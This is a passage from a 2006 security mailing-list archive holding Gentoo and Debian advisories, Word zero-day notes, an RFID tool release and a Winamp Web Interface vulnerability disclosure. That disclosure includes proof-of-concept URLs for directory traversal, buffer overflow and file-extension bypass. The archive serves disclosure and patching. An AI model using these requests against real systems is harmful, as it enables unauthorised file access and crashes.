There is no known workaround at this time. Resolution ========== All SeaMonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.0.6" References ========== [ 1 ] CVE-2006-5462 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462 [ 2 ] CVE-2006-5463 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463 [ 3 ] CVE-2006-5464 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464 [ 4 ] CVE-2006-5747 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747 [ 5 ] CVE-2006-5748 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/9f19b8d7/attachment.bin From kassem.nasser at gmail.com Sun Dec 10 19:50:41 2006 From: kassem.nasser at gmail.com (Kassem Nasser) Date: Sun, 10 Dec 2006 21:50:41 +0200 Subject: [Full-disclosure] Evasion Schemes or techniques Message-ID: Dear all, I am interested in knowing evasion schemes for application based intrusions available, and i appreciate if you can guide me to some papers or links where I can find such information, and where to look for answers about evasion techniques, many thanks -- ------------------------------------------ Kassem Nasser From aluigi at autistici.org Sun Dec 10 20:09:56 2006 From: aluigi at autistici.org (Luigi Auriemma) Date: Sun, 10 Dec 2006 21:09:56 +0100 Subject: [Full-disclosure] Multiple vulnerabilities in Winamp Web Interface 7.5.13 Message-ID: <20061210210956.322ad5b2.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Winamp Web Interface http://www.flippet.org/wawi/ Versions: <= 7.5.13 Platforms: Windows (Winamp plugin) Bugs: A] buffer-overflow in FindBasicAuth B] browsing directory traversal C] buffer-overflow in the browse, download and load functions D] file extension check bypassing in file downloading E] lucky path name Exploitation: remote, only bug A doesn't require privileges Date: 10 Dec 2006 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Winamp Web Interface (Wawi) is a nice open source plugin for Winamp (http://www.winamp.com) which allows the remote administration of the media player through any web browser. ####################################################################### ======= 2) Bugs ======= ----------------------------------- A] buffer-overflow in FindBasicAuth ----------------------------------- FindBasicAuth() is the function located in security.cpp which parses the Authorization HTTP field of the client's request. Basically this function places, sequentially, the auth mode and base64 strings containing the username:password fields in the temp buffer of only 100 bytes and then decodes this string using the userpass buffer ever of 100 bytes. The operation is made through the GetAString() function which limits the strings at 255 chars. In my tests doesn't seem possible to exploit the bug for executing remote code. This is the only vulnerability which doesn't require privileges for being exploited. ------------------------------- B] browsing directory traversal ------------------------------- The Browse() function located in browse.cpp is used for showing the available files in a specific folder within the root directory. The function (as all the others in the program) checks the path received by the client using the GoodPath() function which verifies if exist risks caused by sequential dots and backslashes (like \..\). The problem here is that slashes are correctly converted in backslashes before the calling of this function but the hex slashes %2f aren't allowing the browsing of any folder (files are limited by the extensions specified in the configuration) in the disk where is located the root directory. As already said only browsing is possible, not downloading. The attacker needs the "Browse" privilege for exploiting this bug. ------------------------------------------------------------- C] buffer-overflow in the browse, download and load functions ------------------------------------------------------------- The Browse(), CControl::Download() and CControl::Load() functions are affected by some buffer-overflow caused by the creation of a string containing the root directory plus the path string received from the client using a buffer of only MAX_PATH bytes (260, the same size of the client string). The attacker needs the required privileges related to the function he wants to exploit. ----------------------------------------------------- D] file extension check bypassing in file downloading ----------------------------------------------------- Wawi has also a check for allowing the dowloading of some types of files by the users with the "Download" permission. In the "Music Collections" section of the Wawi configuration we can find two switches for allowing the viewing or the downloading of the Winamp files and all the others. CControl::Download() calls the IsWinampFile() function for checking if the requested filename is supported by Winamp and then allows the downloading if the related option has been selected. A dot after the requested filename will allow an attacker with the "Download" privilege to download any file of any extension located in the root directory. Note: this is not really a bug of Wawi but I report it here since it's one of the rare cases in which it can be exploited maliciously. ------------------ E] lucky path name ------------------ Any of the functions used for handling the files (like browsing, loading, downloading and so on) requires a backslash before the path or file name, like http://localhost/browse?path=\ If exists another folder or file which begins with the same name of the root directory is possible to use it instead of that of the configuration. For example if the root directory is c:\folder and the attacker use http://localhost/browse?path=2 he will browse c:\folder2 if it exists, or he can also download the file c:\folder2.mp3 ever if it exists. The required privileges (and the usual luck!) are needed for exploiting this bug. ####################################################################### =========== 3) The Code =========== A] http://localhost/browse then insert an username longer than 100 chars B] http://localhost/browse?path=%2f..%2f..%2f C] http://localhost/dl?file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa D] http://localhost/dl?file=\file.txt. ####################################################################### ====== 4) Fix ====== This program is no longer supported. ####################################################################### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org From adam.laurie at thebunker.net Sun Dec 10 16:06:36 2006 From: adam.laurie at thebunker.net (Adam Laurie) Date: Sun, 10 Dec 2006 16:06:36 +0000 Subject: [Full-disclosure] RFIDIOt release - version 0.1i Message-ID: <457C308C.8080408@thebunker.net> I'm pleased to announce a new release of RFIDIOt, the open source python RFID library. New in this version: Read/Write Decode/Encode FDX-B (EM4x05 - ISO11784/5 'animal') tags (to Q5 or Hitag2) Read/Write Decode/Encode EM4x02 'Unique' tags (to Q5) Updated GUI for e-passports Full details here: http://rfidiot.org Enjoy, Adam -- Adam Laurie Tel: +44 (0) 1304 814800 The Bunker Secure Hosting Ltd. Fax: +44 (0) 1304 814899 Ash Radar Station http://www.thebunker.net Marshborough Road Sandwich mailto:adam at thebunker.net Kent CT13 0PL UNITED KINGDOM PGP key on keyservers From falco at gentoo.org Sun Dec 10 21:20:33 2006 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 10 Dec 2006 22:20:33 +0100 Subject: [Full-disclosure] [ GLSA 200612-09 ] MadWifi: Kernel driver buffer overflow Message-ID: <20061210212033.GQ16201@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: MadWifi: Kernel driver buffer overflow Date: December 10, 2006 Bugs: #157449 ID: 200612-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== MadWifi is vulnerable to a buffer overflow that could potentially lead to the remote execution of arbitrary code with root privileges. Background ========== MadWifi (Multiband Atheros Driver for Wireless Fidelity) provides a Linux kernel device driver for Atheros-based Wireless LAN devices. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-wireless/madwifi-ng < 0.9.2.1 >= 0.9.2.1 Description =========== Laurent Butti, Jerome Raznieski and Julien Tinnes reported a buffer overflow in the encode_ie() and the giwscan_cb() functions from ieee80211_wireless.c. Impact ====== A remote attacker could send specially crafted wireless WPA packets containing malicious RSN Information Headers (IE) that could potentially lead to the remote execution of arbitrary code as the root user. Workaround ========== There is no known workaround at this time. Resolution ========== All MadWifi users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-wireless/madwifi-ng-0.9.2.1" References ========== [ 1 ] CVE-2006-6332 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6332 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/8a31ef70/attachment.bin From juha-matti.laurio at netti.fi Sun Dec 10 21:51:02 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Sun, 10 Dec 2006 23:51:02 +0200 (EET) Subject: [Full-disclosure] Several updates in Microsoft Word 0-day (CVE-2006-5994) FAQ document Message-ID: <27699978.1451701165787463318.JavaMail.juha-matti.laurio@netti.fi> Several updates have been done to "Microsoft Word 0-day Vulnerability FAQ - December 2006, CVE-2006-5994" document during the weekend. -added information about AV vendor protection -added information about the state of Internet threat meters -added several reference hyperlinks -detailed information about specific Word versions and language builds confirmed as affected Link to the FAQ: http://blogs.securiteam.com/?p=759 - Juha-Matti From juha-matti.laurio at netti.fi Sun Dec 10 21:58:01 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Sun, 10 Dec 2006 23:58:01 +0200 (EET) Subject: [Full-disclosure] Another, different MS Word 0-day vulnerability reported Message-ID: <7590579.1452001165787882309.JavaMail.juha-matti.laurio@netti.fi> New vulnerability in Microsoft Word has been reported. More details available at SANS Internet Storm Center Diary: http://isc.sans.org/diary.php?storyid=1925 Microsoft has confirmed that it is a different vulnerability than this issue reported earlier this week: http://www.microsoft.com/security/msrc/incident_response.mspx Link to MSRC entry: http://blogs.technet.com/msrc/archive/2006/12/10/new-report-of-a-word-zero-day.aspx Word 2002, Word 2003 and Word Viewer 2003 are reportedly affected. Word 2002 is reportedly immune. Vulnerability is being exploited too (i.e. typical targeted attacks). - Juha-Matti From juha-matti.laurio at netti.fi Sun Dec 10 22:10:46 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Mon, 11 Dec 2006 00:10:46 +0200 (EET) Subject: [Full-disclosure] Another, different MS Word 0-day vulnerability reported Message-ID: <4267635.1452591165788646477.JavaMail.juha-matti.laurio@netti.fi> One of the links in previous message was erroneous, because MSRC Blog hyperlink pointed to the wrong URL. Correction follows: Microsoft has confirmed that it is a different vulnerability than this issue reported earlier this week: http://www.microsoft.com/technet/security/advisory/929433.mspx - Juha-Matti From dannf at debian.org Sun Dec 10 21:06:55 2006 From: dannf at debian.org (Dann Frazier) Date: Sun, 10 Dec 2006 22:06:55 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1233-1] New Linux 2.6.8 packages fix several vulnerabilities Message-ID: <20061210210655.GA3749@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1233-1 security at debian.org http://www.debian.org/security/ Dann Frazier December 10th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : kernel-source-2.6.8 Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE ID : CVE-2006-3741 CVE-2006-4538 CVE-2006-4813 CVE-2006-4997 CVE-2006-5174 CVE-2006-5619 CVE-2006-5649 CVE-2006-5751 CVE-2006-5871 Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-3741 Stephane Eranian discovered a local DoS (Denial of Service) vulnerability on the ia64 architecture. A local user could exhaust the available file descriptors by exploiting a counting error in the permonctl() system call. CVE-2006-4538 Kirill Korotaev reported a local DoS (Denial of Service) vulnerability on the ia64 and sparc architectures. A user could cause the system to crash by executing a malformed ELF binary due to insufficient verification of the memory layout. CVE-2006-4813 Dmitriy Monakhov reported a potential memory leak in the __block_prepare_write function. __block_prepare_write does not properly sanitize kernel buffers during error recovery, which could be exploited by local users to gain access to sensitive kernel memory. CVE-2006-4997 ADLab Venustech Info Ltd reported a potential remote DoS (Denial of Service) vulnerability in the IP over ATM subsystem. A remote system could cause the system to crash by sending specially crafted packets that would trigger an attempt to free an already-freed pointer resulting in a system crash. CVE-2006-5174 Martin Schwidefsky reported a potential leak of sensitive information on s390 systems. The copy_from_user function did not clear the remaining bytes of the kernel buffer after receiving a fault on the userspace address, resulting in a leak of uninitialized kernel memory. A local user could exploit this by appending to a file from a bad address. CVE-2006-5619 James Morris reported a potential local DoS (Denial of Service) vulnerability that could be used to hang or oops a system. The seqfile handling for /proc/net/ip6_flowlabel has a flaw that can be exploited to cause an infinite loop by reading this file after creating a flowlabel. CVE-2006-5649 Fabio Massimo Di Nitto reported a potential remote DoS (Denial of Service) vulnerability on powerpc systems. The alignment exception only checked the exception table for -EFAULT, not for other errors. This can be exploited by a local user to cause a system crash (panic). CVE-2006-5751 Eugene Teo reported a vulnerability in the get_fdb_entries function that could potentially be exploited to allow arbitrary code execution with escalated priveleges. CVE-2006-5871 Bill Allombert reported that various mount options are ignored by smbfs when UNIX extensions are enabled. This includes the uid, gid and mode options. Client systems would silently use the server-provided settings instead of honoring these options, changing the security model. This update includes a fix from Haroldo Gamal that forces the kernel to honor these mount options. Note that, since the current versions of smbmount always pass values for these options to the kernel, it is not currently possible to activate unix extensions by omitting mount options. However, this behavior is currently consistent with the current behavior of the next Debian release, 'etch'. The following matrix explains which kernel version for which architecture fix the problems mentioned above: Debian 3.1 (sarge) Source 2.6.8-16sarge6 Alpha architecture 2.6.8-16sarge6 AMD64 architecture 2.6.8-16sarge6 HP Precision architecture 2.6.8-6sarge6 Intel IA-32 architecture 2.6.8-16sarge6 Intel IA-64 architecture 2.6.8-14sarge6 Motorola 680x0 architecture 2.6.8-4sarge6 PowerPC architecture 2.6.8-12sarge6 IBM S/390 architecture 2.6.8-5sarge6 Sun Sparc architecture 2.6.8-15sarge6 The following matrix lists additional packages that were rebuilt for compatibility with or to take advantage of this update: Debian 3.1 (sarge) fai-kernels 1.9.1sarge5 We recommend that you upgrade your kernel package immediately and reboot the machine. If you have built a custom kernel from the kernel source package, you will need to rebuild to take advantage of these fixes. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge5.dsc Size/MD5 checksum: 621 011ee5100e419cb2f0c7bc1cc30ac84a http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge5.tar.gz Size/MD5 checksum: 29571 d148029e7fe13f42ab21c5eb43de8204 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge6.dsc Size/MD5 checksum: 812 f693cfc9f2cd655d084ca005326c126e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge6.tar.gz Size/MD5 checksum: 40661 4e5045c3579ad31ff3ef6bc7c37bd292 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge6.dsc Size/MD5 checksum: 1103 5f1ba98eda946487e954612202ebfd08 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge6.tar.gz Size/MD5 checksum: 78113 c5a97681365085c2fe8e0434f87a99df http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-6sarge6.dsc Size/MD5 checksum: 1013 a992f3eea9565bbad701e8b7b9de901e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-6sarge6.tar.gz Size/MD5 checksum: 69167 1eb1a08a3677ac93c3f2b881a6372830 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge6.dsc Size/MD5 checksum: 1047 371bc0e772a2de1e60d7c147779ee493 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge6.tar.gz Size/MD5 checksum: 92372 5bf576e9a0de27e48c54086ab65f6496 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge6.dsc Size/MD5 checksum: 1191 a89cdab675fdfc739b3e7e45b79a8e79 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge6.tar.gz Size/MD5 checksum: 65823 c026a5b58cd2126f7a5b7b49cd6871d0 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-4sarge6.dsc Size/MD5 checksum: 874 e0b1a23eb96c7f518d5f6ebbf55de163 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-4sarge6.tar.gz Size/MD5 checksum: 19011 ec0effc4a6dc039914338c10ef487de9 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge6.dsc Size/MD5 checksum: 846 359e3d309b037d46ea347dfa221b06fc http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge6.tar.gz Size/MD5 checksum: 14602 b9fade60d70a3149dfb975f46fa24876 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge6.dsc Size/MD5 checksum: 1036 12556f5dfc700f91c58312c425df72e6 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge6.tar.gz Size/MD5 checksum: 28517 d07e30138d6fb6f17664baaba77c2ac5 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge6.dsc Size/MD5 checksum: 1072 30e4b72b36b22e307d597dcb3d4d20e5 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge6.tar.gz Size/MD5 checksum: 28554 0022914d14f9ea691ac35d79b3cc1bb7 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge6.dsc Size/MD5 checksum: 1002 9e5b12cb1d4c98cddc88e5c36bf7d951 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge6.diff.gz Size/MD5 checksum: 1067572 1d83d174a3b2f5e6b03bcbf53c4d877f http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz Size/MD5 checksum: 43929719 0393c05ffa4770c3c5178b74dc7a4282 Architecture independent components: http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-doc-2.6.8_2.6.8-16sarge6_all.deb Size/MD5 checksum: 6192778 9c16bf9ab5f0ecf6551812f3e0e693ac http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-patch-debian-2.6.8_2.6.8-16sarge6_all.deb Size/MD5 checksum: 1116726 3156984be3fc859f717a4253bd0ea462 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge6_all.deb Size/MD5 checksum: 34943318 4b4ecbf67cb066043d0d9447b5238d28 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-tree-2.6.8_2.6.8-16sarge6_all.deb Size/MD5 checksum: 36670 67ed3f0138673fdf06494239a3531972 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-5sarge6_all.deb Size/MD5 checksum: 12640 482b528f209c1c2cae844c28d6b18ae3 Alpha architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3_2.6.8-16sarge6_alpha.deb Size/MD5 checksum: 2761698 83f1d28bc308bc26af3d17abacfdd30f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3-generic_2.6.8-16sarge6_alpha.deb Size/MD5 checksum: 233604 4043f87dd5ae9112e28a72094bea4a86 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3-smp_2.6.8-16sarge6_alpha.deb Size/MD5 checksum: 228886 02018d26ea8bfd1e0b8af7580ba05113 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-3-generic_2.6.8-16sarge6_alpha.deb Size/MD5 checksum: 20237958 816d6775108cf3e9515b5605849d3051 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-3-smp_2.6.8-16sarge6_alpha.deb Size/MD5 checksum: 20097652 e66a50b7968d11f9a1951d544134ebd0 AMD64 architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 2724402 87e94eebbe634daa042e7b62a49b8aab http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-generic_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 227732 e29cc25197c45b2cee30c7f1a957716f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 226898 7dc6ccee008e587fad16c8520e53acc8 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8-smp_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 222930 6fa3fd9a93f01842cb2f913d69b60777 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 224678 c355e6eec253fa1a60592ecf97850d94 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4-smp_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 221322 02266d74b03665409b8616688df66228 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-generic_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 12571284 c0a9538516a6cce193b918dec8b0a0e3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 13271158 208285a35c6d9ee4844f19196810214d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8-smp_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 13228820 497f1fd377746b9969ccb322e81b96fd http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 13074616 10c7d4caa55222d8d4e445b161805335 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4-smp_2.6.8-16sarge6_amd64.deb Size/MD5 checksum: 13053762 8dd7a6bcb65be4d1ec36b5b8df791e9f Intel IA-32 architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 2724464 a8c2ca19ce721a696635823d29debf36 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-generic_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 227760 7cc36da576c41b0cc36ed299ceb3b924 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 226792 92b357210c7cd4f06699af1d8af8d9da http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 222922 6c9be69bcbb8373ea339ecbf7b3b4ab0 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 224708 8a3c89878570fb4f8af43dac22a31f7f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 221334 51763611463ba3b42d81dcc73ddf8cd5 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-generic_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 12571406 e4d6d6b706f2bde44c2f20a9eb63b381 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 13271216 f5091383a3245a517e7275cdf54434d8 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 13228944 9979df016583c651084a316b3e60229c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 13227554 b31733336fad578c66ef2c5ee9809da1 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 13203760 55665ff1ef5f7d19152b0ab55932d55b http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge5_i386.deb Size/MD5 checksum: 12002364 a235fc98f68f558e5ecc1ec7b42dd57e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 2781060 f1541ee9b97a523d3ec3a9718326e599 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-386_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 260032 7b8f626d8a9f4461fa4c0514f88d1030 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-686_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 258208 643338f6374486ca34800bd55f66743a http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-686-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 255130 7f56f0182538f628f7ae6a03500b7aa9 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-k7_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 258046 12e637c2a82bc35395ec0d5eb09218a7 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-k7-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 255482 e47c34d5ea1c446dcb46018b655e4d5e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-386_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 14067514 9e25ec9a77d23f6111a096c22133704d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-686_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 15550508 2ccf7a2cfcb0b1629a8502bc9ea894bb http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-686-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 15384328 8413949fb631cba0c41162f9973f448c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-k7_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 15273574 a4615f36347ba4101f0316d860b0a999 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-k7-smp_2.6.8-16sarge6_i386.deb Size/MD5 checksum: 15165006 ded0d2ddc82edb483927736d0945a26f HP Precision architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 2802706 e66daaf1ddef2c2d2d85c884487e94e1 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-32_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 213308 4f856b7eb46570f2ff63872c76370557 